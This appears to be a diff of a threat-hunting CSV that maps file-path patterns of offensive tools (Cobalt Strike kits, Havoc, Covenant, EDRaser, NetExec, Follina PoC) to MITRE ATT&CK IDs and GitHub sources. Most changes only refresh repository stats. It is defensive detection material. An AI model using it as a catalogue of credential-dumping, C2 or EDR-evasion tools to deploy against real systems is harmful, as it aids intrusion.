T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*\dumpXor\x64\*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*\ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" -"*\EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*\EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*\edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*\Egress-Assess*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter 
Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*\Ekko.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*\elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*\Ekko.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*\ELF\portscan*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*\ELF\serverscan*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" -"*\Elite.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*\Elite.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*\Elite.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*\Elite.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*\emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*\empire_exec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\enc_shellcode.bin*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*\enc_shellcode.h*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 
- T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*\enum_av.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\enum_dns.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\ES.Alan.Core*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*\EternalHushCore.dll*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*\EternalHushCore\*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" 
@@ -6113,7 +6193,7 @@
 "*\evil_pdf\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
 "*\EvilClippy*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
 "*\evilclippy.cs*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z"
-"*\EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-09-25T10:50:52Z","2022-09-04T10:48:49Z"
+"*\EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z"
 "*\evilSignatures.db*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z"
 "*\exe_to_dll\*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","0","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
 "*\Exegol-*.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
@@ -6122,50 +6202,59 @@
 "*\Exegol-images-*\*docker*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*\exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
 "*\ExternalC2\*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
-"*\FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*\FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
 "*\Fertliser.exe*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
 "*\Fertliser.pdb*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
-"*\Files\ContainersFileUrls.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*\Files\ContainersFileUrls.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*\find-computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\follina.py*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z"
-"*\freeze.go","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z"
+"*\freeze.go","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z"
 "*\FtpC2\*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z"
 "*\FudgeC2*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
+"*\get_netconnections.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\GetBrowsers.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*\get-desc-users.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\Get-SpoolStatus.ps1*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z"
 "*\GetWebDAVStatus\","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z"
 "*\GetWebDAVStatus_x64*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z"
 "*\glit.exe*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z"
